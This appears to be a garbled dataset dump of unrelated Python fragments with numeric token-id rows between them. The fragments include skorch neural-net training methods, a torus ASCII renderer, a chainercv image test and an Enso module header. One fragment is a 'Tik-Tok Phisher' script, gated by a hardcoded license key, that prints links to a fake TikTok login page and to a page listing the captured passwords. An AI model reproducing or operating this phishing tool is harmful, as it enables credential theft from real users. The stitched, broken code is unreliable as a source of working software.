Therefore the module is set to evaluation mode by default
beforehand which can be overridden to re-enable features
like dropout by setting ``training=True``.
"""
self.module_.train(training)
return self.infer(Xi)
    def fit_loop(self, X, y=None, epochs=None, **fit_params):
        """The proper fit loop.
        Contains the logic of what actually happens during the fit
        loop: per-epoch iteration over training (and optionally
        validation) batches, loss bookkeeping in ``self.history`` and
        firing of the callback events.
        Parameters
        ----------
        X : input data, compatible with skorch.dataset.Dataset
            By default, you should be able to pass:
            * numpy arrays
            * torch tensors
            * pandas DataFrame or Series
            * a dictionary of the former three
            * a list/tuple of the former three
            * a Dataset
            If this doesn't work with your data, you have to pass a
            ``Dataset`` that can deal with the data.
        y : target data, compatible with skorch.dataset.Dataset
            The same data types as for ``X`` are supported. If your X is
            a Dataset that contains the target, ``y`` may be set to
            None.
        epochs : int or None (default=None)
            If int, train for this number of epochs; if None, use
            ``self.max_epochs``.
        **fit_params : dict
            Additional parameters passed to the ``forward`` method of
            the module and to the train_split call.
        """
        self.check_data(X, y)
        epochs = epochs if epochs is not None else self.max_epochs
        # dataset_valid is None when no train/validation split is
        # configured (train_split=None).
        dataset_train, dataset_valid = self.get_split_datasets(
            X, y, **fit_params)
        on_epoch_kwargs = {
            'dataset_train': dataset_train,
            'dataset_valid': dataset_valid,
        }
        for _ in range(epochs):
            self.notify('on_epoch_begin', **on_epoch_kwargs)
            # --- training pass ---
            for Xi, yi in self.get_iterator(dataset_train, training=True):
                self.notify('on_batch_begin', X=Xi, y=yi, training=True)
                step = self.train_step(Xi, yi, **fit_params)
                self.history.record_batch(
                    'train_loss', step['loss'].data.item())
                # Batch size recorded so that epoch scores can be
                # weighted correctly by downstream callbacks.
                self.history.record_batch('train_batch_size', get_len(Xi))
                self.notify('on_batch_end', X=Xi, y=yi, training=True, **step)
            if dataset_valid is None:
                # No validation split: close the epoch immediately.
                self.notify('on_epoch_end', **on_epoch_kwargs)
                continue
            # --- validation pass (no parameter updates) ---
            for Xi, yi in self.get_iterator(dataset_valid, training=False):
                self.notify('on_batch_begin', X=Xi, y=yi, training=False)
                step = self.validation_step(Xi, yi, **fit_params)
                self.history.record_batch(
                    'valid_loss', step['loss'].data.item())
                self.history.record_batch('valid_batch_size', get_len(Xi))
                self.notify('on_batch_end', X=Xi, y=yi, training=False, **step)
            self.notify('on_epoch_end', **on_epoch_kwargs)
        return self
# pylint: disable=unused-argument
    def partial_fit(self, X, y=None, classes=None, **fit_params):
        """Fit the module.
        If the module is initialized, it is not re-initialized, which
        means that this method should be used if you want to continue
        training a model (warm start).
        Parameters
        ----------
        X : input data, compatible with skorch.dataset.Dataset
            By default, you should be able to pass:
            * numpy arrays
            * torch tensors
            * pandas DataFrame or Series
            * a dictionary of the former three
            * a list/tuple of the former three
            * a Dataset
            If this doesn't work with your data, you have to pass a
            ``Dataset`` that can deal with the data.
        y : target data, compatible with skorch.dataset.Dataset
            The same data types as for ``X`` are supported. If your X is
            a Dataset that contains the target, ``y`` may be set to
            None.
        classes : array, shape (n_classes,)
            Solely for sklearn compatibility, currently unused.
        **fit_params : dict
            Additional parameters passed to the ``forward`` method of
            the module and to the train_split call.
        """
        if not self.initialized_:
            self.initialize()
        self.notify('on_train_begin')
        try:
            self.fit_loop(X, y, **fit_params)
        except KeyboardInterrupt:
            # Deliberate: Ctrl-C stops training gracefully while
            # keeping whatever was learned so far; on_train_end still
            # fires below.
            pass
        self.notify('on_train_end')
        return self
def fit(self, X, y=None, **fit_params):
"""Initialize and fit the module.
If the module was already initialized, by calling fit, the
module will be re-initialized (unless ``warm_start`` is True).
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
if not self.warm_start or not self.initialized_:
self.initialize()
self.partial_fit(X, y, **fit_params)
return self
def forward_iter(self, X, training=False, device='cpu'):
"""Yield outputs of module forward calls on each batch of data.
The storage device of the yielded tensors is determined
by the ``device`` parameter.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
training : bool (default=False)
Whether to set the module to train mode or not.
device : string (default='cpu')
The device to store each inference result on.
This defaults to CPU memory since there is genereally
more memory available there. For performance reasons
this might be changed to a specific CUDA device,
e.g. 'cuda:0'.
Yields
------
yp : torch tensor
Result from a forward call on an individual batch.
"""
dataset = X if is_dataset(X) else self.get_dataset(X)
iterator = self.get_iterator(dataset, training=training)
for Xi, _ in iterator:
yp = self.evaluation_step(Xi, training=training)
if isinstance(yp, tuple):
yield tuple(n.to(device) for n in yp)
else:
yield yp.to(device)
def forward(self, X, training=False, device='cpu'):
"""Gather and concatenate the output from forward call with
input data.
The outputs from ``self.module_.forward`` are gathered on the
compute device specified by ``device`` and then concatenated
using ``torch.cat``. If multiple outputs are returned by
``self.module_.forward``, each one of them must be able to be
concatenated this way.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
training : bool (default=False)
Whether to set the module to train mode or not.
device : string (default='cpu')
The device to store each inference result on.
This defaults to CPU memory since there is genereally
more memory available there. For performance reasons
this might be changed to a specific CUDA device,
e.g. 'cuda:0'.
Returns
-------
y_infer : torch tensor
The result from the forward step.
"""
y_infer = list(self.forward_iter(X, training=training, device=device))
is_multioutput = len(y_infer) > 0 and isinstance(y_infer[0], tuple)
if is_multioutput:
return tuple(map(torch.cat, zip(*y_infer)))
return torch.cat(y_infer)
def infer(self, x, **fit_params):
"""Perform a single inference step on a batch of data.
Parameters
----------
x : input data
A batch of the input data.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
x = to_tensor(x, device=self.device)
if isinstance(x, dict):
x_dict = self._merge_x_and_fit_params(x, fit_params)
return self.module_(**x_dict)
return self.module_(x, **fit_params)
def predict_proba(self, X):
"""Return the output of the module's forward method as a numpy
array.
If forward returns multiple outputs as a tuple, it is assumed
that the first output contains the relevant information. The
other values are ignored.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
Returns
-------
y_proba : numpy ndarray
"""
y_probas = []
for yp in self.forward_iter(X, training=False):
yp = yp[0] if isinstance(yp, tuple) else yp
y_probas.append(to_numpy(yp))
y_proba = np.concatenate(y_probas, 0)
return y_proba
def predict(self, X):
"""Where applicable, return class labels for samples in X.
If the module's forward method returns multiple outputs as a
tuple, it is assumed that the first output contains the
relevant information. The other values are ignored.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
Returns
-------
y_pred : numpy ndarray
"""
return self.predict_proba(X)
# pylint: disable=unused-argument
def get_loss(self, y_pred, y_true, X=None, training=False):
"""Return the loss for this batch.
Parameters
----------
y_pred : torch tensor
Predicted target values
y_true : torch tensor
True target values.
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
train : bool (default=False)
Whether train mode should be used or not.
"""
y_true = to_tensor(y_true, device=self.device)
return self.criterion_(y_pred, y_true)
def get_dataset(self, X, y=None):
"""Get a dataset that contains the input data and is passed to
the iterator.
Override this if you want to initialize your dataset
differently.
If ``dataset__device`` is not set, use ``self.device`` instead.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
Returns
-------
dataset
The initialized dataset.
"""
if is_dataset(X):
return X
dataset = self.dataset
is_initialized = not callable(dataset)
kwargs = self._get_params_for('dataset')
if kwargs and is_initialized:
raise TypeError("Trying to pass an initialized Dataset while "
"passing Dataset arguments ({}) is not "
"allowed.".format(kwargs))
if is_initialized:
return dataset
if 'device' not in kwargs:
kwargs['device'] = self.device
return dataset(X, y, **kwargs)
def get_split_datasets(self, X, y=None, **fit_params):
"""Get internal train and validation datasets.
The validation dataset can be None if ``self.train_split`` is
set to None; then internal validation will be skipped.
Override this if you want to change how the net splits
incoming data into train and validation part.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
**fit_params : dict
Additional parameters passed to the train_split call.
Returns
-------
dataset_train
The initialized training dataset.
dataset_valid
The initialized validation dataset or None
"""
dataset = self.get_dataset(X, y)
if self.train_split:
dataset_train, dataset_valid = self.train_split(
dataset, y, **fit_params)
else:
dataset_train, dataset_valid = dataset, None
return dataset_train, dataset_valid
def get_iterator(self, dataset, training=False):
"""Get an iterator that allows to loop over the batches of the
given data.
If ``self.iterator_train__batch_size`` and/or
``self.iterator_test__batch_size`` are not set, use
``self.batch_size`` instead.
Parameters
----------
dataset : torch Dataset (default=skorch.dataset.Dataset)
Usually, ``self.dataset``, initialized with the corresponding
data, is passed to ``get_iterator``.
training : bool (default=False)
Whether to use ``iterator_train`` or ``iterator_test``.
Returns
-------
iterator
An instantiated iterator that allows to loop over the
mini-batches.
"""
if training:
kwargs = self._get_params_for('iterator_train')
iterator = self.iterator_train
else:
kwargs = self._get_params_for('iterator_valid')
iterator = self.iterator_valid
if 'batch_size' not in kwargs:
kwargs['batch_size'] = self.batch_size
return iterator(dataset, **kwargs)
def _get_params_for_optimizer(self, prefix, named_parameters):
"""Parse kwargs configuration for the optimizer identified by
the given prefix. Supports param group assignment using wildcards:
optimizer__lr=0.05,
optimizer__param_groups=[
('rnn*.period', {'lr': 0.3, 'momentum': 0}),
('rnn0', {'lr': 0.1}),
]
The first positional argument are the param groups.
"""
kwargs = self._get_params_for(prefix)
params = list(named_parameters)
pgroups = []
for pattern, group in kwargs.pop('param_groups', []):
matches = [i for i, (name, _) in enumerate(params) if
fnmatch.fnmatch(name, pattern)]
if matches:
p = [params.pop(i)[1] for i in reversed(matches)]
pgroups.append({'params': p, **group})
if params:
pgroups.append({'params': [p for _, p in params]})
return [pgroups], kwargs
    def _get_params_callbacks(self, deep=True):
        """sklearn's .get_params checks for `hasattr(value,
        'get_params')`. This returns False for a list. But our
        callbacks reside within a list. Hence their parameters have to
        be retrieved separately.

        Parameters
        ----------
        deep : bool (default=True)
          When False, return an empty dict, mirroring the ``deep``
          semantics of sklearn's ``get_params``.

        Returns
        -------
        dict
          Maps ``callbacks__<name>`` to each callback object and
          ``callbacks__<name>__<param>`` to each of its parameters.

        """
        params = {}
        if not deep:
            return params
        # Walk both the instantiated callbacks (callbacks_ may not
        # exist before initialize()) and the class-level defaults.
        callbacks_ = getattr(self, 'callbacks_', [])
        for key, val in chain(callbacks_, self._default_callbacks):
            name = 'callbacks__' + key
            params[name] = val
            if val is None:  # callback deactivated
                continue
            # Expand each callback's own parameters with the usual
            # sklearn double-underscore naming.
            for subkey, subval in val.get_params().items():
                subname = name + '__' + subkey
                params[subname] = subval
        return params
    # XXX remove once deprecation for use_cuda is phased out
    # Also remember to update NeuralNet docstring
    def set_params(self, **kwargs):
        """Set the parameters of this class.

        Valid parameter keys can be listed with ``get_params()``.

        Keys are routed by shape: ``callbacks*`` keys go to the
        callbacks, keys starting with a known component prefix (e.g.
        ``module__``, ``optimizer__``, ``criterion__``) are stored and
        trigger re-initialization of the affected component, and
        everything else is handled by sklearn's ``BaseEstimator``.

        Parameters
        ----------
        **kwargs : dict
          Parameter names mapped to their new values.

        Returns
        -------
        self

        """
        self._check_deprecated_params(**kwargs)
        # Partition incoming parameters into plain sklearn attributes,
        # callback parameters, and prefixed component parameters.
        normal_params, cb_params, special_params = {}, {}, {}
        for key, val in kwargs.items():
            if key.startswith('callbacks'):
                cb_params[key] = val
            elif any(key.startswith(prefix) for prefix in self.prefixes_):
                special_params[key] = val
            else:
                normal_params[key] = val
        BaseEstimator.set_params(self, **normal_params)
        for key, val in special_params.items():
            # NOTE(review): trailing-underscore keys denote fitted
            # attributes and should never arrive here.
            if key.endswith('_'):
                raise ValueError("Not sure: Should this ever happen?")
            else:
                setattr(self, key, val)
        if cb_params:
            # callbacks need special treatment since they are list of tuples
            self.initialize_callbacks()
            self._set_params_callback(**cb_params)
        # Changing component parameters invalidates the corresponding
        # initialized component, so re-initialize as needed.
        if any(key.startswith('criterion') for key in special_params):
            self.initialize_criterion()
        if any(key.startswith('module') for key in special_params):
            self.initialize_module()
            # A new module also invalidates the optimizer bound to it.
            self.initialize_optimizer()
        if any(key.startswith('optimizer') for key in special_params):
            # Model selectors such as GridSearchCV will set the
            # parameters before .initialize() is called, therefore we
            # need to make sure that we have an initialized model here
            # as the optimizer depends on it.
            if not hasattr(self, 'module_'):
                self.initialize_module()
            self.initialize_optimizer()
        # Store all given params on the instance so get_params reflects
        # them (sklearn contract).
        vars(self).update(kwargs)
        return self
def save_params(self, f):
"""Save only the module's parameters, not the whole object.
To save the whole object, use pickle.
Parameters
----------
f : file-like object or str
See ``torch.save`` documentation.
Examples
--------
>>> before = NeuralNetClassifier(mymodule)
>>> before.save_params('path/to/file')
>>> after = NeuralNetClassifier(mymodule).initialize()
>>> after.load_params('path/to/file')
"""
if not hasattr(self, 'module_'):
raise NotInitializedError(
"Cannot save parameters of an un-initialized model. "
"Please initialize first by calling .initialize() "
"or by fitting the model with .fit(...).")
torch.save(self.module_.state_dict(), f)
def load_params(self, f):
"""Load only the module's parameters, not the whole object.
To save and load the whole object, use pickle.
Parameters
----------
f : file-like object or str
See ``torch.load`` documentation.
Examples
--------
>>> before = NeuralNetClassifier(mymodule)
>>> before.save_params('path/to/file')
>>> after = NeuralNetClassifier(mymodule).initialize()
>>> after.load_params('path/to/file')
"""
if not hasattr(self, 'module_'):
raise NotInitializedError(
"Cannot load parameters of an un-initialized model. "
"Please initialize first by calling .initialize() "
"or by fitting the model with .fit(...).")
use_cuda = self.device.startswith('cuda')
cuda_req_not_met = (use_cuda and not torch.cuda.is_available())
if use_cuda or cuda_req_not_met:
# Eiher we want to load the model to the CPU in which case
# we are loading in a way where it doesn't matter if the data
# was on the GPU or not or the model was on the GPU but there
# is no CUDA device available.
if cuda_req_not_met:
warnings.warn(
"Model configured to use CUDA but no CUDA devices "
"available. Loading on CPU instead.",
ResourceWarning)
self.device = 'cpu'
model = torch.load(f, lambda storage, loc: storage)
else:
model = torch.load(f)
self.module_.load_state_dict(model)
#######################
# NeuralNetClassifier #
#######################
neural_net_clf_doc_start = """NeuralNet for classification tasks
Use this specifically if you have a standard classification task,
with input data X and target y.
"""
neural_net_clf_criterion_text = """
criterion : torch criterion (class, default=torch.nn.NLLLoss)
Negative log likelihood loss. Note that the module should return
probabilities, the log is applied during ``get_loss``."""
# pylint: disable=missing-docstring
######################
# NeuralNetRegressor #
######################
neural_net_reg_doc_start = """NeuralNet for regression tasks
Use this specifically if you have a standard regression task,
with input data X and target y. y must be 2d.
"""
neural_net_reg_criterion_text = """
criterion : torch criterion (class, default=torch.nn.MSELoss)
Mean squared error loss."""
# pylint: disable=missing-docstring
| [
37811,
8199,
1523,
2010,
6097,
526,
15931,
198,
198,
11748,
24714,
15699,
198,
6738,
340,
861,
10141,
1330,
6333,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
11748,
302,
198,
11748,
20218,
7753,
198,
11748,
14601,
198,
198,
11748,
299,... | 2.380154 | 16,225 |
# -*- coding: UTF-8 -*-
#Colours Defined Variables
W = '\033[1;37m'
N = '\033[0m'
R="\033[1;37m\033[31m"
B = '\033[1;37m\033[34m'
G = '\033[1;32m'
Y = '\033[1;33;40m'
#Decorators
SBR = W+"("+R+"π"+W+")"
SBG = W+"("+G+"π"+W+")"
SRO = W+"("+R+">"+W+")"
SGO = W+"("+G+">"+W+")"
SEO = W+"("+R+"!"+W+")"
newlin = "\n"
#SBG = '\x1b[1;37m(\x1b[1;32m\xe2\x97\x8f\x1b[1;37m)'
#SBR = '\x1b[1;37m(\x1b[1;37m\x1b[31m\xe2\x97\x8f\x1b[1;37m)'
import os
from base64 import *
from random import choice as c
import time
banner = """
{}
┈┈┈╲┈┈┈┈╱
┈┈┈╱ ▔▔╲
┈┈┃┈▇┈┈▇┈┃ {} DarkSec Present's{}
╭╮┣━━━━━━┫╭╮
┃┃┃┈┈┈┈┈┈┃┃┃ {}Tik-Tok Phisher V1.1{}
╰╯┃┈┈┈┈┈┈┃╰╯ {} By : Nasir Ali{}
┈┈╰┓┏━━┓┏╯
┈┈┈╰╯┈┈╰╯
{}Youtube :{} youtube.com/TheDarkSec
{}Github : {}github.com/nasirxo
{}Facebook :{} facebook.com/nasir.xo
""".format(Y,R,Y,G,Y,G,Y,G,W,G,W,G,W)
os.system("clear")
print(banner)
i=0
key = "darksec47"
while i==0:
try:
#r = get("https://mbasic.facebook.com/nasir.xo")
#data = BeautifulSoup(r.content,features="html.parser")
#xD = data.find('span', attrs={'dir': 'ltr'})
#key = xD.get_text().split()[0]
ikey = input(SBR+" Enter License Key : ")
if ikey == key:
print(SGO+" Authorization Sucessfull ! ")
time.sleep(3)
while i==0:
os.system('clear')
time.sleep(2)
print(banner)
print("""
{} [Select-Option]
{} (1) : Generate Phishing Link
{} (2) : Exit
""".format(Y,SBG,SBG))
op = input(SRO+" Option : ")
n = list('abcdefghijklmnopqrstuvwxyz1234567890')
if str(op) == '1':
ID = ''.join([c(n) for x in range(5)])
KE = b16encode(ID.encode("utf-8"))
print("""
{} [ Link-Generated ]
{} ===================================================
{} Phishing Link :
http://tik-tok.rf.gd/login.php?ID={}
{} Passwords Link :
http://tik-tok.rf.gd/pass.php?KEY={}
{} ===================================================
""".format(G,Y,SGO,ID,SGO,KE.decode("utf-8"),Y))
f = input()
elif str(op) == '2':
print(SBR+" BYE BYE !")
i+=1
quit()
else:
print(SEO+" Invalid Input ! ")
print(SEO+" Invalid Key ! ")
except:
pass | [
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
198,
198,
2,
5216,
4662,
2896,
1389,
15965,
2977,
198,
198,
54,
220,
796,
705,
59,
44427,
58,
16,
26,
2718,
76,
6,
198,
45,
220,
796,
705,
59,
44427,
58,
15,
76,
6,
... | 1.643202 | 1,449 |
import numpy as np
import unittest
from chainercv.utils import assert_is_image
from chainercv.utils import testing
@testing.parameterize(
{
'img': np.random.randint(0, 256, size=(3, 48, 64)),
'color': True, 'check_range': True, 'valid': True},
{
'img': np.random.randint(0, 256, size=(1, 48, 64)),
'color': True, 'check_range': True, 'valid': False},
{
'img': np.random.randint(0, 256, size=(4, 48, 64)),
'color': True, 'check_range': True, 'valid': False},
{
'img': np.ones((3, 48, 64)) * 256,
'color': True, 'check_range': True, 'valid': False},
{
'img': np.ones((3, 48, 64)) * -1,
'color': True, 'check_range': True, 'valid': False},
{
'img': np.ones((3, 48, 64)) * 256,
'color': True, 'check_range': False, 'valid': True},
{
'img': np.random.randint(0, 256, size=(1, 48, 64)),
'color': False, 'check_range': True, 'valid': True},
{
'img': np.random.randint(0, 256, size=(3, 48, 64)),
'color': False, 'check_range': True, 'valid': False},
{
'img': np.ones((1, 48, 64)) * 256,
'color': False, 'check_range': True, 'valid': False},
{
'img': np.ones((1, 48, 64)) * -1,
'color': False, 'check_range': True, 'valid': False},
{
'img': np.ones((1, 48, 64)) * 256,
'color': False, 'check_range': False, 'valid': True},
{
'img': (((0, 1), (2, 3)), ((4, 5), (6, 7)), ((8, 9), (10, 11))),
'color': True, 'check_range': True, 'valid': False},
)
testing.run_module(__name__, __file__)
| [
11748,
299,
32152,
355,
45941,
198,
11748,
555,
715,
395,
198,
198,
6738,
6333,
2798,
85,
13,
26791,
1330,
6818,
62,
271,
62,
9060,
198,
6738,
6333,
2798,
85,
13,
26791,
1330,
4856,
628,
198,
31,
33407,
13,
17143,
2357,
1096,
7,
198... | 2.134211 | 760 |
import os
import numpy as np

# Angular step sizes for sweeping the torus surface; theta presumably
# walks around the tube cross-section and phi around the ring — confirm
# against the render loop.
theta_spacing = 0.07
phi_spacing = 0.02

# Torus geometry: R1 = cross-section circle radius, R2 = distance from
# the torus center to the center of the tube; K2 = viewer distance.
R1 = 1
R2 = 2
K2 = 5
screen_width = 50
screen_height = 50
# Projection constant: scales with screen size and viewer distance,
# inversely with the torus extent (R1 + R2), so the shape fits on screen.
K1 = screen_width * K2 * 3 / (8 * (R1 + R2))
def calc_luminance(cos_a, cos_b, cos_phi, cos_theta, sin_a, sin_b, sin_phi, sin_theta):
    """Compute the surface luminance at one torus point.

    Equivalent to the expression:

        cosphi*costheta*sinB - cosA*costheta*sinphi -
        sinA*sintheta + cosB*(cosA*sintheta - costheta*sinA*sinphi)

    All arguments are the precomputed sines/cosines of the two rotation
    angles (A, B) and the two surface angles (phi, theta).

    :param cos_a:
    :param cos_b:
    :param cos_phi:
    :param cos_theta:
    :param sin_a:
    :param sin_b:
    :param sin_phi:
    :param sin_theta:
    :return: the (unclamped) luminance value.
    """
    # Terms are named but kept in the original evaluation order so the
    # result is bit-for-bit identical to the single-expression form.
    diffuse = cos_phi * cos_theta * sin_b
    shade = cos_a * cos_theta * sin_phi
    tilt = sin_a * sin_theta
    rotated = cos_b * (cos_a * sin_theta - cos_theta * sin_a * sin_phi)
    return diffuse - shade - tilt + rotated
def calc_3d_coordinates(circle_x, circle_y, cos_a, cos_b, cos_phi, sin_a, sin_b, sin_phi,
                        viewer_distance=None):
    """Rotate a point of the torus cross-section into 3D view space.

    Calculating coordinates in 3D space, equal to:

        x = circlex*(cosB*cosphi + sinA*sinB*sinphi) - circley*cosA*sinB;
        y = circlex*(sinB*cosphi - sinA*cosB*sinphi) + circley*cosA*cosB;
        z = K2 + cosA*circlex*sinphi + circley*sinA;

    :param circle_x: x coordinate of the point on the cross-section circle.
    :param circle_y: y coordinate of the point on the cross-section circle.
    :param cos_a:
    :param cos_b:
    :param cos_phi:
    :param sin_a:
    :param sin_b:
    :param sin_phi:
    :param viewer_distance: offset added to z. Defaults to the
        module-level constant ``K2``; passing it explicitly makes the
        function independent of module state (backward compatible).
    :return: the (x, y, z) tuple in view space.
    """
    if viewer_distance is None:
        viewer_distance = K2
    x = circle_x * (cos_b * cos_phi + sin_a * sin_b * sin_phi) - circle_y * cos_a * sin_b
    y = circle_x * (sin_b * cos_phi - sin_a * cos_b * sin_phi) + circle_y * cos_a * cos_b
    z = viewer_distance + cos_a * circle_x * sin_phi + circle_y * sin_a
    return x, y, z
# Animation loop: step both rotation angles each frame, forever.
# NOTE(review): `render_frame` is not defined in this chunk — presumably
# provided elsewhere in the file; confirm before running standalone.
while True:
    for angle in np.arange(0, np.pi, np.pi / 12):
        render_frame(np.pi / 2 + angle, np.pi / 2 + angle / 2)
| [
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
198,
1169,
8326,
62,
2777,
4092,
796,
657,
13,
2998,
198,
34846,
62,
2777,
4092,
796,
657,
13,
2999,
198,
198,
49,
16,
796,
352,
198,
49,
17,
796,
362,
198,
42,
17,
796,
642,
... | 2.027091 | 849 |
#!/usr/bin/python
#This script assumes that gnuplot is in the environment PATH
import getopt, logging, sys, SneeqlLib, TossimLib, AvroraLib, os, UtilLib, checkTupleCount, RandomSeeder, networkLib, StatLib, GraphData
# --- General experiment settings ---
optSneeqlRoot = os.getenv("SNEEQLROOT")
optNumAgendaEvals = 2
# Query duration: six months, expressed in seconds.
optQueryDuration = UtilLib.monthsToSeconds(6)
optOutputRoot = os.getenv("HOME")+"/tmp/output"
optLabel = 'qosCmp'
optTimeStampOutput = True
#optTimeStampOutput = False

# --- Simulator selection and repetition ---
optDoTossim = False
optDoAvrora = True
optNumAvroraRuns = 1 #The number of times the same avrora simulation is repeated
optTossimSyncTime = 4
optDoAvroraCandidates = False
optDoTossimCandidates = False
optDoModel = True
SneeqlLib.optCompileSneeql = True

#Network options
optGenerateRandomNet = False
optSneeqlNetFile = optSneeqlRoot + "/input/networks/10-node-topology.xml"
optAvroraNetFile = None
optNetNumNodes = 10
optNetXDim = 100
optNetYDim = 100

#Schema options
optGenerateRandomSchemas = False
#optNumSchemas = 10
optNumSchemas = 6
optSchemaFile = optSneeqlRoot + "/input/pipes/10-node-schemas.xml"

#Scenario-generation options
#optQueries = ["Q0", "Q2", "Q3temp"]
optQueries = ["Q0"]
# Acquisition rates are in milliseconds.
optAcqRates = [15000]
optMaxBufferingFactors = [None]
#optMaxBufferingFactors = [1]
optQoS = ["min-acq", "min-delivery", "min-energy", "max-lifetime"]
#optQoS = ["min-energy", "max-lifetime"]
optQoSAwareRouting = False
optQoSAwareWhereScheduling = False
optQoSAwareWhenScheduling = False
optRoutingTreesToGenerate = 50
optRoutingTreesToKeep = 5
optBufferingFactor = None
#Output info message to screen and logger if applicable
#Output warning message to screen and logger if applicable
#Output error message to screen and logger if applicable
#Query 3 has a time window, so the fromWindow parameters needs to be adjusted depending on the acquisition interval
#Query 4 has a time window, so the fromWindow parameters needs to be adjusted depending on the acquisition interval
#Tests a candidate plan using Tossim
#get dictionary with summary information for that candidate
#Tests a candidate plan using Avrora
#Invoke tossim simulation for each candidate query-plan
#Invoke avrora simulation for each candidate query-plan
#Tests a specific scenario in Tossim and Avrora
#queryDuration in seconds
#alpha in ms
#total Energy in Joules
#Gets network files specified by user, or generates random network
#Generates different scenarios to be tested
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
1212,
4226,
18533,
326,
19967,
84,
29487,
318,
287,
262,
2858,
46490,
198,
11748,
651,
8738,
11,
18931,
11,
25064,
11,
311,
21381,
13976,
25835,
11,
309,
793,
320,
25835,
11,
5184,
1472,
... | 3.075282 | 797 |
import os
import tensorflow as tf
from ..experiments import runner
import copy # noqa
import numpy as np
from datetime import datetime # noqa
from ..data import pointcloud_fetcher as pfetcher
from ..model import transforms as trans # noqa
from ..experiments import simplebase_experiment as set_exp
from ..experiments import config # noqa
from ..utils import misc as umisc
import plot3dscatter as pscat
| [
11748,
28686,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
6738,
11485,
23100,
6800,
1330,
17490,
198,
11748,
4866,
220,
1303,
645,
20402,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
4818,
8079,
1330,
4818,
8079,
220,
1303,
645,
204... | 3.60177 | 113 |
from __future__ import division, print_function, absolute_import
| [
6738,
11593,
37443,
834,
1330,
7297,
11,
3601,
62,
8818,
11,
4112,
62,
11748,
198
] | 4.333333 | 15 |
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.quasimode
#
# ----------------------------------------------------------------------------
"""
Implements the Quasimode.
This module implements a singleton class that represents the
quasimode. It handles all quasimodal key events, and the logic for
transitioning in and out of the quasimode. When the quasimode
terminates, it initiates the execution of the command, if any,
that the user indicated while in the quasimode. It also handles
the various kinds of user "error", which primarily consist of "no command
matches the text the user typed".
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import weakref
import logging
